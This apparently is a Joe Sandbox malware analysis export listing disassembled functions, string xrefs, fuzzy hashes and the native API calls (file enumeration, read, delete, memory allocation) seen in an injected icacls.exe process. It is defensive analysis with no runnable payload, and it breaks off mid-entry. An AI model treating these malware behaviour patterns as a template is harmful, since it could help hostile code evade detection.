Snapshot File: hcaresult_11_2_40f0000_qLmzoTzSrlQuBN.jbxd

Yara matches

Similarity

API ID:
String ID: "l$'$0$0$1$2J$3h$:$:$=$@$B$F$H$Hc$L$N$T$VB$Y$Z$_&$e$ee$f$g$h$k$l[$m$n$o$pb$q$qY$r$t$v$v6$zP$'$,
API String ID: 0-1887296616
Opcode ID: 70dc07248748bbcf699dfae24f3540c6aaf573384cfe0b865fe1f861dab2424b
Instruction ID: 69cfa756e47f64bba589813c61f536d1941dbf34134411c1d0649a71ed222335
Opcode Fuzzy Hash: 70dc07248748bbcf699dfae24f3540c6aaf573384cfe0b865fe1f861dab2424b
Instruction Fuzzy Hash: 42D126B0D06669CBEB60CF41C9987DEBBB1BB45308F5085C9C55C2B281C7BA1AC9CF95

Function 042FF544 Relevance: 52.7, Strings: 42, Instructions: 168COMMON

Download Yara Rule

Strings

h, xrefs: 042FF672
Y, xrefs: 042FF9BA
:, xrefs: 042FF77E
H, xrefs: 042FF889
N, xrefs: 042FF81F
,, xrefs: 042FF715
0, xrefs: 042FF875
VB, xrefs: 042FF729
3h, xrefs: 042FF969
l[, xrefs: 042FF5D5
n, xrefs: 042FF8E5
g, xrefs: 042FF793
f, xrefs: 042FF79A
qY, xrefs: 042FF6F7
Z, xrefs: 042FFA33
v6, xrefs: 042FF6C6
v, xrefs: 042FF83D
o, xrefs: 042FF861
=, xrefs: 042FF801
', xrefs: 042FF923
e, xrefs: 042FF770
2J, xrefs: 042FFA47
1, xrefs: 042FF56C
Hc, xrefs: 042FF6D0
r, xrefs: 042FF7C8
t, xrefs: 042FF919
k, xrefs: 042FF7E6
F, xrefs: 042FF7BE
:, xrefs: 042FF8D1
T, xrefs: 042FF8C7
L, xrefs: 042FFA01
q, xrefs: 042FF7DC
B, xrefs: 042FF8B3
"l, xrefs: 042FF636
', xrefs: 042FF7A1
0, xrefs: 042FF581
zP, xrefs: 042FF5E9
m, xrefs: 042FF893
ee, xrefs: 042FF987
_&, xrefs: 042FF70B
pb, xrefs: 042FF9ED
@, xrefs: 042FF851

Memory Dump Source

Source File: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40f0000_qLmzoTzSrlQuBN.jbxd

Yara matches

Similarity

API ID:
String ID: "l$'$0$0$1$2J$3h$:$:$=$@$B$F$H$Hc$L$N$T$VB$Y$Z$_&$e$ee$f$g$h$k$l[$m$n$o$pb$q$qY$r$t$v$v6$zP$'$,
API String ID: 0-1887296616
Opcode ID: 6cb81b2581987e0b93218ed7f1e759353f6c77b64ccd7db8d2eecf57cda5d9df
Instruction ID: b97363a8c4ee4d32b85928cba57a6982b2fd85bbabba419c86eff510fced54be
Opcode Fuzzy Hash: 6cb81b2581987e0b93218ed7f1e759353f6c77b64ccd7db8d2eecf57cda5d9df
Instruction Fuzzy Hash: 5EC125B0906669CBEB60CF41C9987DEBBB1BB45308F5085C9C55C2B281C7BA1AC9CF95

Function 04303EFC Relevance: 13.8, Strings: 11, Instructions: 89COMMON

Download Yara Rule

Strings

i, xrefs: 04303F9F
n, xrefs: 04303F98
e, xrefs: 04303F5B
l, xrefs: 04303F3F
D, xrefs: 04303F8A
x, xrefs: 04303F38
\, xrefs: 04303F31
r, xrefs: 04303F4D
w, xrefs: 04303F91
e, xrefs: 04303F54
r, xrefs: 04303F46

Memory Dump Source

Source File: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40f0000_qLmzoTzSrlQuBN.jbxd

Yara matches

Similarity

API ID:
String ID: D$\$e$e$i$l$n$r$r$w$x
API String ID: 0-685823316
Opcode ID: 8cbf8c8658e3fb3b03509e40d6da3c283e91cc991c6cd6aaa4358d093a81ccec
Instruction ID: 3d59e85bfa260ac6e6ff035b5f5c8deeb815437bbe58d4fd0e5b1d2a889a4ee5
Opcode Fuzzy Hash: 8cbf8c8658e3fb3b03509e40d6da3c283e91cc991c6cd6aaa4358d093a81ccec
Instruction Fuzzy Hash: 7F3186B1D51218AEEF54DFD4CC85BEEBBB9AF08708F00815DE608B6180DBB51648CBA4

Function 0430B32F Relevance: 10.1, Strings: 8, Instructions: 132COMMON

Download Yara Rule

Strings

i, xrefs: 0430B442
m, xrefs: 0430B43B
., xrefs: 0430B366
o, xrefs: 0430B427
r, xrefs: 0430B431
P, xrefs: 0430B41D
e, xrefs: 0430B449
x, xrefs: 0430B36D

Memory Dump Source

Source File: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40f0000_qLmzoTzSrlQuBN.jbxd

Yara matches

Similarity

API ID:
String ID: .$P$e$i$m$o$r$x
API String ID: 0-620024284
Opcode ID: 140a10f604e59127cee0f21f63effb03433f4f9e915aebb5c27c47d019ed8e94
Instruction ID: 558354749bd686e41bfb177c0efe3cbd555affbde15a9164653a64e4e3d4360c
Opcode Fuzzy Hash: 140a10f604e59127cee0f21f63effb03433f4f9e915aebb5c27c47d019ed8e94
Instruction Fuzzy Hash: EF4185B5810228B7FB24EBA4CD44FDF777CAF54308F409599A60DA7140EAB56B4C8FA1

Function 042FC1F4 Relevance: 7.5, Strings: 6, Instructions: 43COMMON

Download Yara Rule

Strings

7, xrefs: 042FC1FE
0, xrefs: 042FC22A
y, xrefs: 042FC21E
, xrefs: 042FC23A
, xrefs: 042FC222
, xrefs: 042FC226

Memory Dump Source

Source File: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40f0000_qLmzoTzSrlQuBN.jbxd

Yara matches

Similarity

API ID:
String ID: $ $ $0$7$y
API String ID: 0-1887721190
Opcode ID: 6905aac88a2bab343a9ea8f1c92228b289b48633530349f82e4eaaf1046b6d53
Instruction ID: 148aefdb89e386596695b52d07b509af5490cc7a3ddba4c6d85233e74ec31112
Opcode Fuzzy Hash: 6905aac88a2bab343a9ea8f1c92228b289b48633530349f82e4eaaf1046b6d53
Instruction Fuzzy Hash: 8B11E520D187CED9CB22C7FC88186AEBF715F63224F4883D994F12A2D2C2754206C7A6

Function 0430B514 Relevance: 6.3, Strings: 5, Instructions: 88COMMON

Download Yara Rule

Strings

6, xrefs: 0430B5D7
L, xrefs: 0430B5F3
9, xrefs: 0430B5E5
G, xrefs: 0430B5DE
1, xrefs: 0430B5EC

Memory Dump Source

Source File: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40f0000_qLmzoTzSrlQuBN.jbxd

Yara matches

Similarity

API ID:
String ID: 1$6$9$G$L
API String ID: 0-2378690077
Opcode ID: 90078135a35b67ef050a57a758e25030af81cf14813ff206c4440f097880be1f
Instruction ID: b0209be8ce067d1d34cf415570dde5112142f476e8e58c681b43b781e11048e7
Opcode Fuzzy Hash: 90078135a35b67ef050a57a758e25030af81cf14813ff206c4440f097880be1f
Instruction Fuzzy Hash: BF3137B1910119BBEB04DB94CD45FEEB7B8EF44308F009195E918A7240E775BB058BE5

Function 042F864B Relevance: 6.3, Strings: 5, Instructions: 26COMMON

Download Yara Rule

Strings

J@MX, xrefs: 042F866A
,, xrefs: 042F8677
I, xrefs: 042F8671
KVE\, xrefs: 042F865A
J@MXI, xrefs: 042F8682, 042F868B

Memory Dump Source

Source File: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40f0000_qLmzoTzSrlQuBN.jbxd

Yara matches

Similarity

API ID:
String ID: ,$I$J@MX$J@MXI$KVE\
API String ID: 0-2378357586
Opcode ID: 6f0afee83f86d7da0c2e2dc43eb0e8247ced1488ce6e090f01fc68613628330e
Instruction ID: 8ccec62e05e91b5b178fb6f848d5a41a15a3cf765f585526436b319d4ff65385
Opcode Fuzzy Hash: 6f0afee83f86d7da0c2e2dc43eb0e8247ced1488ce6e090f01fc68613628330e
Instruction Fuzzy Hash: DFE0223081024CABDB04EFE8C818ABEFB38EF05200F6049ACDE289B241E7759615CBC1

Function 04305F82 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

6-G0, xrefs: 043060D5
6-G0991eL2, xrefs: 04306105, 04306108
6-G0991eL2, xrefs: 043060F1, 043060FD, 0430610E
991e, xrefs: 043060DC

Memory Dump Source

Source File: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40f0000_qLmzoTzSrlQuBN.jbxd

Yara matches

Similarity

API ID:
String ID: 6-G0$6-G0991eL2$6-G0991eL2$991e
API String ID: 0-609750243
Opcode ID: 2cc9f6d8561cc5225360b3d92ec91f07b0f5aed8e12bd0f261c8375aad391206
Instruction ID: 8fe9733250037746c4fa86f7b540e58698ea991f2a1689ba363b013930f1c543
Opcode Fuzzy Hash: 2cc9f6d8561cc5225360b3d92ec91f07b0f5aed8e12bd0f261c8375aad391206
Instruction Fuzzy Hash: 17319A369083959BD721DF64C857BCDBF64EF82324F20839DD6958B0C2E3316516CB85

Function 04306079 Relevance: 5.1, Strings: 4, Instructions: 61COMMON

Download Yara Rule

Strings

6-G0, xrefs: 043060D5
6-G0991eL2, xrefs: 04306105, 04306108
6-G0991eL2, xrefs: 043060F1, 043060FD, 0430610E
991e, xrefs: 043060DC

Memory Dump Source

Source File: 0000000B.00000002.4127873755.00000000040F0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_40f0000_qLmzoTzSrlQuBN.jbxd

Yara matches

Similarity

API ID:
String ID: 6-G0$6-G0991eL2$6-G0991eL2$991e
API String ID: 0-609750243
Opcode ID: 8802a5f6b275ef875805f863fa5b22f61d083cd00cc3910f24a7fdd2116c9be4
Instruction ID: 63883caf6274f9d7d025d747510c4c91fed57b364d45d38ad5a0076453ea0229
Opcode Fuzzy Hash: 8802a5f6b275ef875805f863fa5b22f61d083cd00cc3910f24a7fdd2116c9be4
Instruction Fuzzy Hash: B5110871E40258B6EB21EBD08D43FDFBB789F41B54F008154FA107F2C1D6B4AA0687A5

Analysis Process: icacls.exePID: 7644, Parent PID: 5548COMMON

Execution Graph

Execution Coverage:	2.5%
Dynamic/Decrypted Code Coverage:	4.1%
Signature Coverage:	1.5%
Total number of Nodes:	459
Total number of Limit Nodes:	75

Executed Functions

Function 0270CB30 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNELBASE(?,00000000), ref: 0270CC11
FindNextFileW.KERNELBASE(?,00000010), ref: 0270CC4E
FindClose.KERNELBASE(?), ref: 0270CC59

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 458c584e004789596e816963003fd97cffd912a37553a5c55f80390ed5a5a78e
Instruction ID: 8e4eb59f028aaa7e22d09f24095ad44f76bb9c385b7173cb47e23024ee4588d9
Opcode Fuzzy Hash: 458c584e004789596e816963003fd97cffd912a37553a5c55f80390ed5a5a78e
Instruction Fuzzy Hash: 4B3163B1900308BBDB22DF64CC85FFB77BD9F85744F14455DBA08A7190DB70AA888BA4

Function 027195F0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,E127BCFA,?), ref: 027196EE

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: b4aa2abc0f597fb3c8a67b1e2370640f6c7b8aa3687261bf84b87fbaa8914498
Instruction ID: d894061a0cd80f5e0f1f58bd635670d1561470af2ce52131ec4be50ba1ed3d94
Opcode Fuzzy Hash: b4aa2abc0f597fb3c8a67b1e2370640f6c7b8aa3687261bf84b87fbaa8914498
Instruction Fuzzy Hash: BD31A2B5A00248AFDB14DF98D880EEEB7B9AF8C714F10861DF919A7341D730A951CFA5

Function 02719760 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02719846

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f7963848d1c7f22c098e8dbcb6ae9d2ec12d8f5c71f4970fe513223c6f024622
Instruction ID: 8bd79e1367c7bd31cf76b23924efd2d1a6ad7b76bf99ae6d6fdad22c6b1dc9df
Opcode Fuzzy Hash: f7963848d1c7f22c098e8dbcb6ae9d2ec12d8f5c71f4970fe513223c6f024622
Instruction Fuzzy Hash: D431C8B5A00608AFDB14DFA8D881EDFB7B9AF8D714F10821DF918A7241D730A911CFA5

Function 02719A50 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(0270236E,?,0271850F,00000000,00000004,00003000,?,?,?,?,?,0271850F,0270236E), ref: 02719B15

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f4be446e6f3c4d6077fefd41de50ed17fb150ca130346621f2634f7fc20e6425
Instruction ID: f42bdfd9242a06911f22ccabd88bdec3993e1b868cf55a4581bc6e846f0bf583
Opcode Fuzzy Hash: f4be446e6f3c4d6077fefd41de50ed17fb150ca130346621f2634f7fc20e6425
Instruction Fuzzy Hash: E621FAB5A00209AFDB20DF68DC81E9FB7B9AF88710F10811DFD18A7241D770A911CFA5

Function 02719850 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(?), ref: 027198E6

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 341ec23d205b9135ef7d930caf0ec5c9a146e06d8dd43f881b71608017e3a56b
Instruction ID: 4f291732df735912953e1402366fd42c5287a8f1f34fd340e5f22681c5a65018
Opcode Fuzzy Hash: 341ec23d205b9135ef7d930caf0ec5c9a146e06d8dd43f881b71608017e3a56b
Instruction Fuzzy Hash: 37115171600608BED720EB68CC45FEBB76DEF89714F10854DFA18A7281DB7179058BA5

Function 027198F0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02719924

Memory Dump Source

Source File: 0000000D.00000002.4126760720.00000000026F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 026F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_26f0000_icacls.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 10087827329fb40a5d604f6313aa19ac2f1ec0e91e3ba1001f9476195abcf75b
Instruction ID: 099348edda76514c9757bc2e138797ce5018bfe121a6ced2450342c072efd689
Opcode Fuzzy Hash: 10087827329fb40a5d604f6313aa19ac2f1ec0e91e3ba1001f9476195abcf75b
Instruction Fuzzy Hash: BCE08C32200608BFD620FA69CC01F9B776DDFC5760F01801AFA0CA7281D671B9108BF4

Function 02EF4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF434A

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7d5f43fa66b895b6d2a328e406c93026255d2a5b9824db3d3a8a59e26153b0f
Instruction ID: 130fabd688954ef71b95286baf1783abc675f9c57584f96dabf3165c130d02ae
Opcode Fuzzy Hash: f7d5f43fa66b895b6d2a328e406c93026255d2a5b9824db3d3a8a59e26153b0f
Instruction Fuzzy Hash: 93900231605C00629140715988C4547400597E0381B95C011E1424598C8A148A566361

Function 02EF4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF465A

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7916045b465d1482547d40c0ad51b0971f12ea10f91bf30551e3c9d220108d5c
Instruction ID: 1661c7f8b8a1551165a1da3cfe852ad88248f2cef7b7a2d51e6c6410b2dc308c
Opcode Fuzzy Hash: 7916045b465d1482547d40c0ad51b0971f12ea10f91bf30551e3c9d220108d5c
Instruction Fuzzy Hash: 1B90026160190092414071598844407600597E13813D5C115A15545A4C86188955A269

Function 02EF2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2AFA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 80dc40f06b266319e49b5af219e4639c5febe878f94320e5a005eb60543b7e42
Instruction ID: 601080f03902a8d8ded82b90489a5384bc3732ea353e9142202301cba2befd8e
Opcode Fuzzy Hash: 80dc40f06b266319e49b5af219e4639c5febe878f94320e5a005eb60543b7e42
Instruction Fuzzy Hash: 1C900225221800520145B559464450B044597D63D13D5C015F24165D4CC62189656321

Function 02EF2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2ADA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65f0a9f20fca26813350f07f4f1e522b4aa5c174f05075f81a0916966146f1f1
Instruction ID: 10b67a3a23bee509ba62367a59186f1a5d82def44f6c4ebba4d1abc79bec2ba8
Opcode Fuzzy Hash: 65f0a9f20fca26813350f07f4f1e522b4aa5c174f05075f81a0916966146f1f1
Instruction Fuzzy Hash: 14900435311C00530105F55D47445070047C7D53D13D5C031F30155D4CD731CD717131

Function 02EF2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2BEA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: af7f2c7f9148be2c0e4f14546b452d70d4e171695280d326e17037d8e57d5fe3
Instruction ID: 10f6d85155200fcdafd3e3a6f38b0b7696fcab875ae1a55f32d129999d9833b2
Opcode Fuzzy Hash: af7f2c7f9148be2c0e4f14546b452d70d4e171695280d326e17037d8e57d5fe3
Instruction Fuzzy Hash: BD90023120584892D14071598444A47001587D0385F95C011A10646D8D96258E55B661

Function 02EF2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2BFA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ebc3e053428ac816f5acae52cb5a78bd17c2ced5a30802a45b320e61d68f17bd
Instruction ID: e08e6fe8b5ef39da401bc0eff01a091e5865ea8e757154b3c56baa71e8c5ccd1
Opcode Fuzzy Hash: ebc3e053428ac816f5acae52cb5a78bd17c2ced5a30802a45b320e61d68f17bd
Instruction Fuzzy Hash: 7190023120180852D1807159844464B000587D1381FD5C015A1025698DCA158B5977A1

Function 02EF2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2BAA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 66b2a981248ad8a75aa50c14e333d281166ab3ef2f4848c2874f36cf7a3f7179
Instruction ID: 6e9507ef9567bb025571b058e9faf88d2c3b00246d1097422ca869d55bf223db
Opcode Fuzzy Hash: 66b2a981248ad8a75aa50c14e333d281166ab3ef2f4848c2874f36cf7a3f7179
Instruction Fuzzy Hash: 7790023160580852D15071598454747000587D0381F95C011A1024698D87558B5576A1

Function 02EF2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2B6A

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a66eefe695b362927bb35a1f5980dfddaf5c269dbd7f769a0c186dbd8a0cefbb
Instruction ID: 73d5a364b85b098d554ade29c712d83d806b843d0b8d5da69ec51628dd52516a
Opcode Fuzzy Hash: a66eefe695b362927bb35a1f5980dfddaf5c269dbd7f769a0c186dbd8a0cefbb
Instruction Fuzzy Hash: 3C90026120280053410571598454617400A87E0281B95C021E20145D4DC52589917125

Function 02EF2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2EEA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5d124f1ecea98aab6888c22a2e3dde0c076efeec43a78ba5b0656e238508908a
Instruction ID: 4071eaf0ee864c77e72fdd15bfe46903a4dead48e16a9d0c3c81d82bd92701ed
Opcode Fuzzy Hash: 5d124f1ecea98aab6888c22a2e3dde0c076efeec43a78ba5b0656e238508908a
Instruction Fuzzy Hash: 7B900261201C0453D14075598844607000587D0382F95C011A3064599E8A298D517135

Function 02EF2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2E8A

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 58d3fe094b29def0303520b9f2dde855873bccc894285af2fee221b1f74ceac9
Instruction ID: 27988a077184762da55aacecb1e835a03b2032cbed18e6e10cdeb66eca80fa35
Opcode Fuzzy Hash: 58d3fe094b29def0303520b9f2dde855873bccc894285af2fee221b1f74ceac9
Instruction Fuzzy Hash: 8A90022160180552D10171598444617000A87D02C1FD5C022A2024599ECA258A92B131

Function 02EF2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02EF2FEA

Memory Dump Source

Source File: 0000000D.00000002.4128320775.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E80000, based on PE: true

Associated: 0000000D.00000002.4128320775.0000000002FA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.0000000002FAD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000D.00000002.4128320775.000000000301E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_2e80000_icacls.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ae4054e9b0a19e91c6e3c1a1c1819ec7b7e7dcb89ed274d1c4f755fb0b4e14e
